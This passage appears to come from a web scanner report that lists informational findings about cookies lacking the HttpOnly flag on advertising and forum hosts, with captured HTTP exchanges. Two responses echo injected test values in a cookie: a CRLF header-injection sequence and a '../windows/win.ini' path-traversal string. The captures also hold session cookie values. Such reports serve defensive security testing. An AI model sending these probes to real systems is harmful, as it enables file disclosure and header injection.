GET /api/track?application_id=ee612e29-9b27-4ec8-bbf8-759478dd3755&url_fbid=9Lm6uVSxV_u&parent_fbid=&referrer=http%3A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%3FclickData%3DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%3Dhttp%3A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%3Bwi.728%3Bhi.90%3Bai.236941493%3Bct.1%2F01&location=http%3A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%3FsendVar%3D20State_49PromoOffer%26source%3DECbc0000000WIP00O%26fbid%3D9Lm6uVSxV_u&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 01:39:25 GMT
Etag: "95f18f7b21ad86257635a566290d793cc8c6a807"
P3P: CP="NID DSP ALL COR"
Server: nginx/0.7.65
Set-Cookie: meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; Domain=.meteorsolutions.com; expires=Sun, 16 Sep 2012 01:39:25 GMT; Path=/
Set-Cookie: uid=c5699614-96b6-4b6d-81ac-02170daae0a6; Domain=.meteorsolutions.com; expires=Sun, 16 Sep 2012 01:39:25 GMT; Path=/
Content-Length: 133
Connection: keep-alive

meteor.json_query_callback({"parent_id": "", "id": "9Lm6uVSxV_u", "uid": "c5699614\\x2D96b6\\x2D4b6d\\x2D81ac\\x2D02170daae0a6"}, 0);

12.82. http://clk.atdmt.com/go/335787632/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /go/335787632/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/335787632/direct;wi.728;hi.90;ai.236941493;ct.1/01 HTTP/1.1
Host: clk.atdmt.com
Proxy-Connection: keep-alive
Referer: http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=http://clk.atdmt.com/go/335787632/direct;wi.728;hi.90;ai.236941493;ct.1/01
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ach00=eb2a/1c72:ec40/2f33; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; expires=Monday, 16-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73fa1b; expires=Monday, 16-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Sat, 17 Sep 2011 01:38:34 GMT
Connection: close


12.83. http://cpanel.app9.hubspot.com/salog.js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cpanel.app9.hubspot.com
Path:   /salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: cpanel.app9.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.cpanel.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:50:46 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: .ASPXANONYMOUS=R27wZXuTzQEkAAAAMjg1YjZkOWQtZGIxZS00MTZiLWJlYWItYmIwMmYzMTA1ZGI30; expires=Sat, 15-Sep-2012 19:50:46 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=93ed7895-0288-4720-bfdc-c10d00f88606; domain=cpanel.app9.hubspot.com; expires=Thu, 16-Sep-2021 05:00:00 GMT; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 498
Set-Cookie: HUBSPOT20080=3977319596.0.0000; path=/


var hsUse20Servers = true;
var hsDayEndsIn = 29353;
var hsWeekEndsIn = 202153;
var hsMonthEndsIn = 1238953;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-09-16 15:50
...[SNIP]...

12.84. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-507/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=collective728x90&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:collective728x90;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:933,56,15:951,2,15;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:1:1:1;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2476560B826,110236|0,1#0,24;expires=Mon, 17 Oct 2011 01:48:55 GMT;path=/;domain=.zedo.com;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=43
Expires: Sat, 17 Sep 2011 01:49:38 GMT
Date: Sat, 17 Sep 2011 01:48:55 GMT
Content-Length: 4570
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='collective7
...[SNIP]...

12.85. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=0&s=1&l=1&t=e&f=1&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; aps=1; FFcat=933,56,15:951,2,15; FFad=0:0; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,3#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0
If-None-Match: "1b6340a-de5c-4a8e0f9fb9dc0"

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: ZFFAbh=977B826,20|121_977#365;expires=Fri, 16 Dec 2011 01:00:20 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=990B826,20|121_977#0;expires=Sun, 16 Sep 2012 01:00:20 GMT;domain=.zedo.com;path=/;
ETag: "1822b34-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=14981
Expires: Sat, 17 Sep 2011 05:10:01 GMT
Date: Sat, 17 Sep 2011 01:00:20 GMT
Connection: close

GIF89a.............!.......,...........D..;



12.86. http://d7.zedo.com/utils/ecSet.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h484782Za669089Zc826000187%2C826000187Zs173Zt1260Zm68Zb43199&d=.zedo.com HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; aps=2; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,5#0,24:0,6#0,24:0,6#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h484782Za669089Zc826000187,826000187Zs173Zt1260Zm68Zb43199;expires=Mon, 17 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "3a9d5cb-1f5-47f2908ed51c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=5107
Date: Sat, 17 Sep 2011 01:48:54 GMT
Connection: close



12.87. http://dc.tremormedia.com/comp.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dc.tremormedia.com
Path:   /comp.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /comp.gif?eid=componentload&oid=488&pid=4cd03d45dc897&proguid=BC83C2F2DB3467A167FAAE3D31ABAD3485FC64CD&pgguid=D4CB0F4E70255A1C79C9C19235EC52D7C184A292&r=764519872 HTTP/1.1
Host: dc.tremormedia.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TremorSession=e236fb4e-fce8-43bc-8bbf-188db77aba97; TremorUser=f166015f-92bf-489e-b027-c259d6238411

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:47:59 GMT
Server: Apache
Set-Cookie: TremorUser=f166015f-92bf-489e-b027-c259d6238411612ee%0d%0a82978850c1c; path=/; expires=Sat, 14-Jun-14 01:47:59 GMT
Last-Modified: Thu, 20 Aug 2009 15:44:50 GMT
ETag: "24dc14-2b-a1c54080"
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: max-age=0, no-store
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.88. http://dc.tremormedia.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dc.tremormedia.com
Path:   /crossdomain.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /crossdomain.xml HTTP/1.1
Host: dc.tremormedia.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TremorUser=f166015f-92bf-489e-b027-c259d6238411

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:47:47 GMT
Server: Apache
Set-Cookie: TremorUser=f166015f-92bf-489e-b027-c259d6238411; path=/; expires=Sat, 14-Jun-14 01:47:47 GMT
Last-Modified: Wed, 24 Dec 2008 16:16:27 GMT
ETag: "1fe10f-bb-36c48cc0"
Accept-Ranges: bytes
Content-Length: 187
Cache-Control: max-age=0, no-store
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
</cross-domain-policy>

12.89. http://dc.tremormedia.com/st.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dc.tremormedia.com
Path:   /st.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /st.gif?eid=adresponse&adresp=-1&oid=488&pid=4cd03d45dc897&proguid=BC83C2F2DB3467A167FAAE3D31ABAD3485FC64CD&pgguid=D4CB0F4E70255A1C79C9C19235EC52D7C184A292&pguid=32E5D2257B4FCCF530AADF7875D9BC885FB1D617&cguid=&curl=&adguid=E41FF79EEBD25B8AE7F872DA7FF66662AD994D34&adurl=&adpos=openingslate&adsys=&adcue=&adtag=http%3A%2F%2Foascentral.bostonherald.com%2FRealMedia%2Fads%2Fadstream_sx.ads%2Fbh.heraldinteractive.com%2Fvideo%2F1%5BrandomNo%5D%40x91&adnum=1&tm=%3BkvqD%3DT%3Bkviroll%3Dtrue%3Bkvvchoice%3Dtrue%3Bkvvchoiceselect%3Dtrue%3Bkvasq%3Dtrue%3B%3Bkvtakeover%3Dtrue&r=169738044 HTTP/1.1
Host: dc.tremormedia.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TremorSession=e236fb4e-fce8-43bc-8bbf-188db77aba97; TremorUser=f166015f-92bf-489e-b027-c259d6238411

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:48:17 GMT
Server: Apache
Set-Cookie: TremorUser=f166015f-92bf-489e-b027-c259d6238411../../../../../../../../../../windows/win.ini; path=/; expires=Sat, 14-Jun-14 01:48:17 GMT
Last-Modified: Thu, 20 Aug 2009 15:44:50 GMT
ETag: "2fe12-2b-a1c54080"
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: max-age=0, no-store
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.90. http://forums.cpanel.net/calendar.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.cpanel.net
Path:   /calendar.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /calendar.php HTTP/1.1
Host: forums.cpanel.net
Proxy-Connection: keep-alive
Referer: http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bb_sessionhash=7b42b50b859ac7069bd0783e6f7218a5; bb_lastvisit=1316202173; bb_lastactivity=0; __utma=21786852.1717603496.1316220231.1316220231.1316220231.1; __utmb=21786852.2.10.1316220231; __utmc=21786852; __utmz=21786852.1316220231.1.1.utmcsr=duckduckgo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=21786852.usergroup-1-Unregistered%20%2F%20Not%20Logged%20In

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:50:39 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 PHP/5.3.3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3
Set-Cookie: bb_lastactivity=0; expires=Sat, 15-Sep-2012 19:50:40 GMT; path=/; domain=.cpanel.net
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Set-Cookie: vbseo_loggedin=deleted; expires=Thu, 16-Sep-2010 19:50:39 GMT; path=/
Content-Length: 39506
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

12.91. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.cpanel.net
Path:   /f43/connection-imap-server-failed-96021.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /f43/connection-imap-server-failed-96021.html HTTP/1.1
Host: forums.cpanel.net
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=imap+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:42:54 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 PHP/5.3.3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3
Set-Cookie: bb_lastactivity=0; expires=Sat, 15-Sep-2012 19:42:54 GMT; path=/; domain=.cpanel.net
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Set-Cookie: vbseo_loggedin=deleted; expires=Thu, 16-Sep-2010 19:42:53 GMT; path=/
Content-Length: 99145
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

12.92. http://g2.gumgum.com/services/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g2.gumgum.com
Path:   /services/get

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/get?callback=GUMGUM.startServices&_=1316238826949&pubdata={%22t%22:%22tmzdtcom%22,%22v%22:1,%22r%22:%229926v3%22,%22rf%22:%22%22} HTTP/1.1
Host: g2.gumgum.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=UTF-8
Date: Sat, 17 Sep 2011 00:53:25 GMT
Server: nginx/0.6.35
Set-Cookie: ggtests=t3%3D44%26t2%3D23%26t1%3D49%26t10%3D48%26t11%3D50%26t4%3D7%26t6%3D43%26t7%3D45%26t9%3D47; Domain=.gumgum.com; Path=/
Content-Length: 263
Connection: keep-alive

GUMGUM.startServices({"at":{"mh":200,"sf":true,"mw":200,"ps":true},"pxs":{"across33":true,"qsg":"Entertainment.tmzdtcom","media6":true,"qac":"p-00TsOkvHvnsZU","file":"pixels","priority":9,"quantcast":
...[SNIP]...

12.93. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1030885431/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1030885431/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/viewthroughconversion/1030885431/?label=rTvUCIe7kwIQt6DI6wM&amp;guid=ON&amp;script=0&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/cntacp_22UverseLPtest_LP_1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sat, 17 Sep 2011 01:39:52 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: id=22ebde8547010054||t=1316223577|et=730|cs=002213fd48e76a563c866b19c6; expires=Mon, 16-Sep-2013 01:39:37 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

12.94. http://i.w55c.net/a.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /a.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

